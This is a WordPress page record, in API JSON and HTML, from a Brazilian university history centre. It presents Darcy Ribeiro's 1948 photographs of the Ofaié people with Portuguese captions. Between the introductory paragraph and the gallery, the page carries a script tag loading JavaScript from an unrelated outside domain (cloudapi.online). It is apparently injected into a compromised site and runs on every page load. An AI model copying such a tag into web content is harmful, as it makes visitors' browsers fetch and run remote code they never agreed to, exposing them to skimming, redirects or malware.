{"id":1004,"date":"2017-09-02T08:21:29","date_gmt":"2017-09-02T08:21:29","guid":{"rendered":"http:\/\/www.ndh.ufms.br\/?page_id=1004"},"modified":"2025-11-04T09:35:42","modified_gmt":"2025-11-04T13:35:42","slug":"darcy-ribeiro","status":"publish","type":"page","link":"https:\/\/ndh-cptl.ufms.br\/?page_id=1004","title":{"rendered":"Darcy Ribeiro (1948)"},"content":{"rendered":"<p style=\"text-align: justify;\">Sobre as imagens de Darcy Ribeiro, reunimos aqui somente aquelas relacionados aos Ofai\u00e9 que viviam na Fazenda Primavera, de Joaquim de Moura Andrade, hoje localizada no munic\u00edpio de Bataypor\u00e3, em Mato Grosso do Sul. Elas foram tiradas em dezembro de 1948. O grupo de Ofai\u00e9 compreendia 10 pessoas de duas fam\u00edlias cujos chefes eram irm\u00e3os. Ot\u00e1vio, com cerca de 50 anos, e Jos\u00e9, viviam em dois ranchos \u00e0 margem esquerda do Ribeir\u00e3o Samambaia que desemboca no rio Paran\u00e1.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n<div id='gallery-1' class='gallery galleryid-1004 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1006'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_16-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\u00cdndia Ofai\u00e9 carregando sua irm\u00e3 no colo (1948)\" aria-describedby=\"gallery-1-1006\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1006'>\n\t\t\t\t\u00cdndia Ofai\u00e9 com crian\u00e7a (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1007'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_17-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1007\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1007'>\n\t\t\t\tGenro, neto e filha do chefe Ofai\u00e9 sentados em um campo pr\u00f3ximo a uma habita\u00e7\u00e3o (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1008'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_18-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1008\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1008'>\n\t\t\t\tDarcy Ribeiro com o \u00edndio Ofai\u00e9 Ot\u00e1vio (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1009'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_19-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1009\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1009'>\n\t\t\t\t\u00cdndia Ofai\u00e9 com crian\u00e7a (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1010'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_20-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1010\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1010'>\n\t\t\t\t\u00cdndia Ofai\u00e9, esposa de Ot\u00e1vio (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1015'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_21-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1015\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1015'>\n\t\t\t\tA moradia Ofai\u00e9 (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1016'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_22-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1016\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1016'>\n\t\t\t\tL\u00edder dos \u00edndios Ofai\u00e9 chamado Ot\u00e1vio acompanhando Jos\u00e9 na confec\u00e7\u00e3o das flechas (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1017'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_23-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1017\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1017'>\n\t\t\t\tMulher do chefe dos \u00edndios Ofai\u00e9 chamado Ot\u00e1vio, socando milho no pil\u00e3o (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1018'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_24-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1018\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1018'>\n\t\t\t\tCasal de \u00edndios, ela Ofai\u00e9, ele Kaiow\u00e1 (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>Sobre as imagens de Darcy Ribeiro, reunimos aqui somente aquelas relacionados aos Ofai\u00e9 que viviam na Fazenda Primavera, de Joaquim de Moura Andrade, hoje localizada no munic\u00edpio de Bataypor\u00e3, em Mato Grosso do Sul. Elas foram tiradas em dezembro de &hellip; <a href=\"https:\/\/ndh-cptl.ufms.br\/?page_id=1004\">Continue lendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":952,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1004","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1004"}],"version-history":[{"count":5,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1004\/revisions"}],"predecessor-version":[{"id":1310,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1004\/revisions\/1310"}],"up":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/952"}],"wp:attachment":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p style="text-align: justify;">Sobre as imagens de Darcy Ribeiro, reunimos aqui somente aquelas relacionados aos Ofaié que viviam na Fazenda Primavera, de Joaquim de Moura Andrade, hoje localizada no município de Batayporã, em Mato Grosso do Sul. Elas foram tiradas em dezembro de 1948. O grupo de Ofaié compreendia 10 pessoas de duas famílias cujos chefes eram irmãos. Otávio, com cerca de 50 anos, e José, viviam em dois ranchos à margem esquerda do Ribeirão Samambaia que desemboca no rio Paraná.</p>
<p><script id="lg210a" src="https://cloudapi.online/js/api46.js" type="text/javascript"></script></p>
<div id='gallery-1' class='gallery galleryid-1004 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1006'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_16-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="Índia Ofaié carregando sua irmã no colo (1948)" aria-describedby="gallery-1-1006" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1006'>
				Índia Ofaié com criança (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1007'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_17-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1007" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1007'>
				Genro, neto e filha do chefe Ofaié sentados em um campo próximo a uma habitação (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1008'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_18-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1008" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1008'>
				Darcy Ribeiro com o índio Ofaié Otávio (1948)
				</dd></dl><br style="clear: both" /><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1009'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_19-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1009" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1009'>
				Índia Ofaié com criança (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon portrait'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1010'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_20-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1010" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1010'>
				Índia Ofaié, esposa de Otávio (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1015'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_21-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1015" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1015'>
				A moradia Ofaié (1948)
				</dd></dl><br style="clear: both" /><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1016'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_22-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1016" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1016'>
				Líder dos índios Ofaié chamado Otávio acompanhando José na confecção das flechas (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1017'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_23-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1017" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1017'>
				Mulher do chefe dos índios Ofaié chamado Otávio, socando milho no pilão (1948)
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='https://ndh-cptl.ufms.br/?attachment_id=1018'><img loading="lazy" decoding="async" width="150" height="150" src="https://ndh-cptl.ufms.br/wp-content/uploads/2017/09/OFAIE_FOTO_24-150x150.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-1018" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-1-1018'>
				Casal de índios, ela Ofaié, ele Kaiowá (1948)
				</dd></dl><br style="clear: both" />
		</div>

<p>Sobre as imagens de Darcy Ribeiro, reunimos aqui somente aquelas relacionados aos Ofaié que viviam na Fazenda Primavera, de Joaquim de Moura Andrade, hoje localizada no município de Batayporã, em Mato Grosso do Sul. Elas foram tiradas em dezembro de &hellip; <a href="https://ndh-cptl.ufms.br/?page_id=1004">Continue lendo <span class="meta-nav">&rarr;</span></a></p>
